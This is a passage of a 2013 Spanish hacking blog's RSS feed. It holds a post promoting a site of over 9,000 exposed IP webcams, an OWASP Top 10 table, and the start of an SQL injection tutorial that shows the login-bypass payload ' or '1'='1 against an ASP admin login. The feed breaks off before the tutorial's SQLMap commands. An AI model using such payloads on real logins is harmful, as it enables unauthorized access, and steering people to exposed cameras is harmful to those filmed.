src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/E0H_zDk1JCM" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2013-04-20T16:17:13.774-03:00</app:edited><media:thumbnail url="http://3.bp.blogspot.com/-_fIoBOrOBRo/UXLorCQckPI/AAAAAAAAB9I/S28HFkb5Cww/s72-c/java_hacked.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2013/04/nuevo-bug-en-java-7u17-video-msf-applet.html</feedburner:origLink></item><item><title>El Reality Show del Mundo Real - Más de 9 mil cámaras IP expuestas</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/eH4kb137sTA/el-reality-show-del-mundo-real-mas-de-9.html</link><category>Bug</category><category>Seguridad Web</category><category>Noticias</category><category>Seguridad</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Fri, 12 Apr 2013 14:02:10 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-9178031642355132254</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-Lz-82oJg5m4/UWdt2EtnVyI/AAAAAAAAB8w/RBXngrGGW28/s1600/Webcams+IP+expuestas.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="334" src="http://1.bp.blogspot.com/-Lz-82oJg5m4/UWdt2EtnVyI/AAAAAAAAB8w/RBXngrGGW28/s640/Webcams+IP+expuestas.bmp" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Recién estuve leyendo un &lt;a href="http://cryptogasm.com/2013/03/all-the-webcams-part-3/" target="_blank"&gt;artículo&lt;/a&gt; y &lt;a href="http://www.slideshare.net/Rsaesha/the-dangers-of-black-box-devices" target="_blank"&gt;presentación&lt;/a&gt; de &lt;b&gt;Adrian Hayter&lt;/b&gt; en el que expone la facilidad con la cual se puede acceder a Webcams IP (que simplemente están libres en Internet) y cómo con una simple búsqueda en SHODAN podemos entretenernos viendo muchas cámara IP de cualquier parte del mundo. Les recomiendo que &lt;a href="http://www.slideshare.net/Rsaesha/the-dangers-of-black-box-devices" target="_blank"&gt;&lt;b&gt;vean la presentación&lt;/b&gt;&lt;/a&gt; en la que pone con que tipos de cosas se encontró escudriñando por tantas cámaras (interiores de casas, clubes nocturnos, piezas con servidores, tiendas, etc...).&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;

&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Bueno, el punto es que &lt;b&gt;Adrian Hayter&lt;/b&gt; se dio el tiempo y trabajo de crear una plataforma web con todas las cámaras IP expuestas que ha encontrado por diferentes métodos y hasta el momento van &lt;b&gt;9,258 Webcams&lt;/b&gt;, un número bastante grande y que va en aumento. &lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
La plataforma web está muy bien lograda y nos muestra 16 Webcams simultáneamente por página (con un total de 579 páginas hasta el momento), además le agregó geolocalización para saber de que parte del mundo es tal cámara, con un sólo click se va a la webcam seleccionada y muestra país, ciudad, Latitud y longitud.&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-ZUrrIOI2Vdc/UWduGiutOiI/AAAAAAAAB84/X1A_A7AvnFc/s1600/Webcam+IP+expuesta.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="323" src="http://1.bp.blogspot.com/-ZUrrIOI2Vdc/UWduGiutOiI/AAAAAAAAB84/X1A_A7AvnFc/s640/Webcam+IP+expuesta.bmp" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Pues bueno, no deja de ser muy preocupante, pero sin duda hará que más de alguno pierda un poco de tiempo buscando algo interesante (y es muy probable que lo haya).&lt;br /&gt;
&lt;br /&gt;
Sin más que decir, les dejo con la web en rigor:&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;a href="http://cryptogasm.com/webcams/index.php?page=1" target="_blank"&gt;&lt;span style="font-size: x-large;"&gt;&lt;b&gt;Recopilación de más de 9 mil Webcams IP Expuestas&lt;/b&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="clear: both; text-align: center;"&gt;
&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/eH4kb137sTA" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2013-04-12T18:02:10.055-03:00</app:edited><media:thumbnail url="http://1.bp.blogspot.com/-Lz-82oJg5m4/UWdt2EtnVyI/AAAAAAAAB8w/RBXngrGGW28/s72-c/Webcams+IP+expuestas.bmp" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2013/04/el-reality-show-del-mundo-real-mas-de-9.html</feedburner:origLink></item><item><title>OWASP Top 10 2013 - Las 10 vulnerabilidades más Críticas</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/OFeVqeqzdzg/owasp-top-10-2013-las-10.html</link><category>OWASP</category><category>Bug</category><category>Seguridad Web</category><category>Noticias</category><category>Seguridad</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Thu, 04 Apr 2013 12:02:19 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-4110408756837382195</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-VWoSgn2L1_Y/UV2HBbDDuqI/AAAAAAAAB8Y/sxQQGaEC3YE/s1600/owasp-topten2013.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="225" src="http://1.bp.blogspot.com/-VWoSgn2L1_Y/UV2HBbDDuqI/AAAAAAAAB8Y/sxQQGaEC3YE/s400/owasp-topten2013.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;OWASP Top 10 &lt;/b&gt;es un proyecto dedicado a recopilar las vulnerabilidades más&amp;nbsp;riesgosas&amp;nbsp;para la&amp;nbsp;seguridad&amp;nbsp;de nuestras aplicaciones web.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
El objetivo del proyecto Top 10 es crear conciencia acerca de la seguridad de las aplicaciones web mediante la identificación de algunos de los riesgos más críticos que enfrentan las organizaciones.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
A medida que nuestra infraestructura digital crece, se hace cada vez más complejo lograr la seguridad total de las aplicaciones web. Diariamente hay muchos ataques cibernéticos y &amp;nbsp;ya no nos podemos dar el lujo de tolerar los problemas de seguridad como los que se presentan en este OWASP Top 10.&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
A continuación les dejo la&amp;nbsp;OWASP Top 10 2013:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;

&lt;div style="clear: both; text-align: center;"&gt;
&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;
&lt;/div&gt;

&lt;br /&gt;

&lt;STYLE type="text/css"&gt; 
#id_tabla A:link {text-decoration:none;color:#0000cc;} 
#id_tabla A:visited {text-decoration:none;color:#ffcc33;} 
#id_tabla A:active {text-decoration:none;color:#ff0000;} 
#id_tabla A:hover {text-decoration:underline;color:#999999;}
td{color: #000000}
&lt;/STYLE&gt;

&lt;table cellspacing="1" cellpadding="1" border="0" width="100%;" id="id_tabla"&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://www.owasp.org/index.php/Top_10_2013-A1" title="Top 10 2013-A1" class="mw-redirect"&gt;
&lt;div style="background-image: linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -o-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -moz-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -webkit-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -ms-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -webkit-gradient( linear, left bottom, left top, color-stop(0.34, #86E86A), color-stop(0.97, #CEF5D2) ); border:2px solid #a1a1a1; padding: 5px 10px 5px 10px; width: 100%; border-radius:15px; -moz-border-radius:15px; font-size: 100%; font-weight: bold; text-align: center; height: 80px; z-index: 100; position: relative;"&gt;&lt;br /&gt;A1-Injection
    &lt;/div&gt;
&lt;/a&gt;
&lt;/td&gt;
&lt;td&gt;&lt;div style="background-color: #F2F2F2; border:2px solid #A1A1A1; padding: 5px 10px 5px 40px; width: 90%; border-radius:15px; -moz-border-radius:15px; font-size: 100%; font-weight: normal; text-align: left; line-height: 1em; position: relative;"&gt;
&lt;p&gt;Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.
&lt;/p&gt;
&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://www.owasp.org/index.php/Top_10_2013-A2" title="Top 10 2013-A2" class="mw-redirect"&gt;
&lt;div style="background-image: linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -o-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -moz-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -webkit-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -ms-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -webkit-gradient( linear, left bottom, left top, color-stop(0.34, #86E86A), color-stop(0.97, #CEF5D2) ); border:2px solid #a1a1a1; padding: 5px 10px 5px 10px; width: 100%; border-radius:15px; -moz-border-radius:15px; font-size: 100%; font-weight: bold; text-align: center; height: 80px; z-index: 100; position: relative;"&gt;A2–Broken Authentication and Session Management
&lt;/div&gt;
&lt;/a&gt;
&lt;/td&gt;
&lt;td&gt;&lt;div style="background-color: #F2F2F2; border:2px solid #A1A1A1; padding: 5px 10px 5px 40px; width: 90%; border-radius:15px; -moz-border-radius:15px; font-size: 100%; font-weight: normal; text-align: left; line-height: 1em; position: relative;"&gt;
&lt;p&gt;Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, session tokens, or  exploit other implementation flaws to assume other users’ identities.
&lt;/p&gt;
&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://www.owasp.org/index.php/Top_10_2013-A3" title="Top 10 2013-A3" class="mw-redirect"&gt;
&lt;div style="background-image: linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -o-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -moz-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -webkit-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -ms-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -webkit-gradient( linear, left bottom, left top, color-stop(0.34, #86E86A), color-stop(0.97, #CEF5D2) ); border:2px solid #a1a1a1; padding: 5px 10px 5px 10px; width: 100%; border-radius:15px; -moz-border-radius:15px; font-size: 100%; font-weight: bold; text-align: center; height: 80px; z-index: 100; position: relative;"&gt;&lt;br /&gt;A3–Cross-Site Scripting (XSS)
&lt;/div&gt;
&lt;/a&gt;
&lt;/td&gt;
&lt;td&gt;&lt;div style="background-color: #F2F2F2; border:2px solid #A1A1A1; padding: 5px 10px 5px 40px; width: 90%; border-radius:15px; -moz-border-radius:15px; font-size: 100%; font-weight: normal; text-align: left; line-height: 1em; position: relative;"&gt;
&lt;p&gt;XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
&lt;/p&gt;
&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://www.owasp.org/index.php/Top_10_2013-A4" title="Top 10 2013-A4" class="mw-redirect"&gt;
&lt;div style="background-image: linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -o-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -moz-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -webkit-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -ms-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -webkit-gradient( linear, left bottom, left top, color-stop(0.34, #86E86A), color-stop(0.97, #CEF5D2) ); border:2px solid #a1a1a1; padding: 5px 10px 5px 10px; width: 100%; border-radius:15px; -moz-border-radius:15px; font-size: 100%; font-weight: bold; text-align: center; height: 80px; z-index: 100; position: relative;"&gt;&lt;br /&gt;A4–Insecure Direct Object References
&lt;/div&gt;
&lt;/a&gt;
&lt;/td&gt;
&lt;td&gt;&lt;div style="background-color: #F2F2F2; border:2px solid #A1A1A1; padding: 5px 10px 5px 40px; width: 90%; border-radius:15px; -moz-border-radius:15px; font-size: 100%; font-weight: normal; text-align: left; line-height: 1em; position: relative;"&gt;
&lt;p&gt;A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.
&lt;/p&gt;
&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://www.owasp.org/index.php/Top_10_2013-A5" title="Top 10 2013-A6" class="mw-redirect"&gt;
&lt;div style="background-image: linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -o-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -moz-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -webkit-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -ms-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -webkit-gradient( linear, left bottom, left top, color-stop(0.34, #86E86A), color-stop(0.97, #CEF5D2) ); border:2px solid #a1a1a1; padding: 5px 10px 5px 10px; width: 100%; border-radius:15px; -moz-border-radius:15px; font-size: 100%; font-weight: bold; text-align: center; height: 80px; z-index: 100; position: relative;"&gt;&lt;br /&gt;A5–Security Misconfiguration
&lt;/div&gt;
&lt;/a&gt;
&lt;/td&gt;
&lt;td&gt;&lt;div style="background-color: #F2F2F2; border:2px solid #A1A1A1; padding: 5px 10px 5px 40px; width: 90%; border-radius:15px; -moz-border-radius:15px; font-size: 100%; font-weight: normal; text-align: left; line-height: 1em; position: relative;"&gt;
&lt;p&gt;Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. All these settings should be defined, implemented, and maintained as many are not shipped with secure defaults. This includes keeping all software up to date.
&lt;/p&gt;
&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://www.owasp.org/index.php/Top_10_2013-A6" title="Top 10 2013-A6" class="mw-redirect"&gt;
&lt;div style="background-image: linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -o-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -moz-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -webkit-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -ms-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -webkit-gradient( linear, left bottom, left top, color-stop(0.34, #86E86A), color-stop(0.97, #CEF5D2) ); border:2px solid #a1a1a1; padding: 5px 10px 5px 10px; width: 100%; border-radius:15px; -moz-border-radius:15px; font-size: 100%; font-weight: bold; text-align: center; height: 80px; z-index: 100; position: relative;"&gt;&lt;br /&gt;A6–Sensitive Data Exposure
&lt;/div&gt;
&lt;/a&gt;
&lt;/td&gt;
&lt;td&gt;&lt;div style="background-color: #F2F2F2; border:2px solid #A1A1A1; padding: 5px 10px 5px 40px; width: 90%; border-radius:15px; -moz-border-radius:15px; font-size: 100%; font-weight: normal; text-align: left; line-height: 1em; position: relative;"&gt;
&lt;p&gt;Many web applications do not properly protect sensitive data, such as credit cards, tax ids, and authentication credentials. Attackers may steal or modify such weakly protected data to conduct identity theft, credit card fraud, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.
&lt;/p&gt;
&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://www.owasp.org/index.php/Top_10_2013-A7" title="Top 10 2013-A7" class="mw-redirect"&gt;
&lt;div style="background-image: linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -o-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -moz-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -webkit-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -ms-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -webkit-gradient( linear, left bottom, left top, color-stop(0.34, #86E86A), color-stop(0.97, #CEF5D2) ); border:2px solid #a1a1a1; padding: 5px 10px 5px 10px; width: 100%; border-radius:15px; -moz-border-radius:15px; font-size: 100%; font-weight: bold; text-align: center; height: 80px; z-index: 100; position: relative;"&gt;A7–Missing Function Level Access Control 
&lt;/div&gt;
&lt;/a&gt;
&lt;/td&gt;
&lt;td&gt;&lt;div style="background-color: #F2F2F2; border:2px solid #A1A1A1; padding: 5px 10px 5px 40px; width: 90%; border-radius:15px; -moz-border-radius:15px; font-size: 100%; font-weight: normal; text-align: left; line-height: 1em; position: relative;"&gt;
&lt;p&gt;Virtually all web applications verify function level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access unauthorized functionality.
&lt;/p&gt;
&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://www.owasp.org/index.php/Top_10_2013-A8" title="Top 10 2013-A8" class="mw-redirect"&gt;
&lt;div style="background-image: linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -o-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -moz-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -webkit-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -ms-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -webkit-gradient( linear, left bottom, left top, color-stop(0.34, #86E86A), color-stop(0.97, #CEF5D2) ); border:2px solid #a1a1a1; padding: 5px 10px 5px 10px; width: 100%; border-radius:15px; -moz-border-radius:15px; font-size: 100%; font-weight: bold; text-align: center; height: 80px; z-index: 100; position: relative;"&gt;A8-Cross-Site Request Forgery (CSRF)
&lt;/div&gt;
&lt;/a&gt;
&lt;/td&gt;
&lt;td&gt;&lt;div style="background-color: #F2F2F2; border:2px solid #A1A1A1; padding: 5px 10px 5px 40px; width: 90%; border-radius:15px; -moz-border-radius:15px; font-size: 100%; font-weight: normal; text-align: left; line-height: 1em; position: relative;"&gt;
&lt;p&gt;A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim.
&lt;/p&gt;
&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://www.owasp.org/index.php/Top_10_2013-A9" title="Top 10 2013-A9" class="mw-redirect"&gt;
&lt;div style="background-image: linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -o-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -moz-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -webkit-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -ms-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -webkit-gradient( linear, left bottom, left top, color-stop(0.34, #86E86A), color-stop(0.97, #CEF5D2) ); border:2px solid #a1a1a1; padding: 5px 10px 5px 10px; width: 100%; border-radius:15px; -moz-border-radius:15px; font-size: 100%; font-weight: bold; text-align: center; height: 80px; z-index: 100; position: relative;"&gt;A9-Using Components with Known Vulnerabilities
&lt;/div&gt;
&lt;/a&gt;
&lt;/td&gt;
&lt;td&gt;&lt;div style="background-color: #F2F2F2; border:2px solid #A1A1A1; padding: 5px 10px 5px 40px; width: 90%; border-radius:15px; -moz-border-radius:15px; font-size: 100%; font-weight: normal; text-align: left; line-height: 1em; position: relative;"&gt;
&lt;p&gt;Vulnerable components, such as libraries, frameworks, and other software modules almost always run with full privilege. So, if exploited, they can cause serious data loss or server takeover. Applications using these vulnerable components may undermine their defenses and enable a range of possible attacks and impacts.
&lt;/p&gt;
&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://www.owasp.org/index.php/Top_10_2013-A10" title="Top 10 2013-A10" class="mw-redirect"&gt;
&lt;div style="background-image: linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -o-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -moz-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -webkit-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -ms-linear-gradient(bottom, #86E86A 34%, #CEF5D2 97%); background-image: -webkit-gradient( linear, left bottom, left top, color-stop(0.34, #86E86A), color-stop(0.97, #CEF5D2) ); border:2px solid #a1a1a1; padding: 5px 10px 5px 10px; width: 100%; border-radius:15px; -moz-border-radius:15px; font-size: 100%; font-weight: bold; text-align: center; height: 80px; z-index: 100; position: relative;"&gt;A10–Unvalidated Redirects and Forwards
&lt;/div&gt;
&lt;/a&gt;
&lt;/td&gt;
&lt;td&gt;&lt;div style="background-color: #F2F2F2; border:2px solid #A1A1A1; padding: 5px 10px 5px 40px; width: 90%; border-radius:15px; -moz-border-radius:15px; font-size: 100%; font-weight: normal; text-align: left; line-height: 1em; position: relative;"&gt;
&lt;p&gt;Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages. 
&lt;/p&gt;
&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;

&lt;br /&gt;
&lt;b&gt;Más información:&lt;/b&gt;&amp;nbsp;&lt;a href="https://www.owasp.org/index.php/Top_10_2013-Table_of_Contents" target="_blank"&gt;https://www.owasp.org/&lt;/a&gt;&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/OFeVqeqzdzg" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2013-04-04T16:02:19.390-03:00</app:edited><media:thumbnail url="http://1.bp.blogspot.com/-VWoSgn2L1_Y/UV2HBbDDuqI/AAAAAAAAB8Y/sxQQGaEC3YE/s72-c/owasp-topten2013.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2013/04/owasp-top-10-2013-las-10.html</feedburner:origLink></item><item><title>SQLi utilizando método POST con SQLMap</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/92vN7k6HTGs/sqli-utilizando-metodo-post-con-sqlmap.html</link><category>Tutoriales</category><category>SQLMap</category><category>SQLi</category><author>noreply@blogger.com (Caleb Bucker)</author><pubDate>Tue, 26 Mar 2013 19:13:09 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-5761209687816946315</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i48.tinypic.com/259lw8z.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="280" src="http://i48.tinypic.com/259lw8z.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
En esta entrada breve y simple, se detallaran los pasos que realizaremos cuando necesitemos explotar una vulnerabilidad de Sql Injection, que mayormente se encuentran en algunos servidores basados en SQL Server y Oracle. Estas vulnerabilidades son típicas en los LOGIN'S Administrativos, ya que como debemos de saber, &amp;nbsp;que cuando ingresamos el usuario y password estos datos se envían a través del método POST, por lo tanto puede existir la posibilidad de que al ingresar datos falsos o algunos bypasses, esta nos pueda mostrar algún error que nos permita identificar la vulnerabilidad, por tanto se puede explotar automatizadamente utilizando SQLMAP ejecutando comandos para enviar la petición en POST y no en GET como se "acostumbra".&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Si no me explique bien, pues al buen entendedor pocas palabras!!! entonces sin mas rodeos, vamos a la acción!&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;div style="text-align: justify;"&gt;
Tenemos un LOGIN en ASP, en la cual no tenemos los datos correctos ni nada por el estilo, ya que no hemos encontrado ningún tipo de vulnerabilidad en el servidor que nos brinde estos datos, por tanto como somos curiosos e inteligentes empezamos a probar datos falsos y algunos bypasses como el famosillo ' or '1'='1 como se muestra en la imagen siguiente:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i45.tinypic.com/alq0aw.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="226" src="http://i45.tinypic.com/alq0aw.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span style="text-align: justify;"&gt;Después de haber colocado este bypass, tenemos la posibilidad de que el servidor nos muestre algún tipo de vulnerabilidad o el error que nos permita identificar si es vulnerable a SQL Injection, tanto así que si el servidor se encuentra bajo ASP esta nos puede mostrar el error "&lt;/span&gt;&lt;span style="color: lime; text-align: justify;"&gt;Microsoft OLE DB Provider for ODBC Drivers error '80040e14'&lt;/span&gt;&lt;span style="text-align: justify;"&gt;", si esto llega a suceder, corremos la suerte de poder explotar esta vulnerabilidad. En este caso después de haber colocado dicho bypass, el servidor nos devuelve el siguiente error:&lt;/span&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i47.tinypic.com/e8wbog.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://i47.tinypic.com/e8wbog.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Al visualizar esta vulnerabilidad, somos consciente que se puede explotar manualmente o automatizadamente, para así obtener los datos que nos permita logearnos de una manera correcta al servidor.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
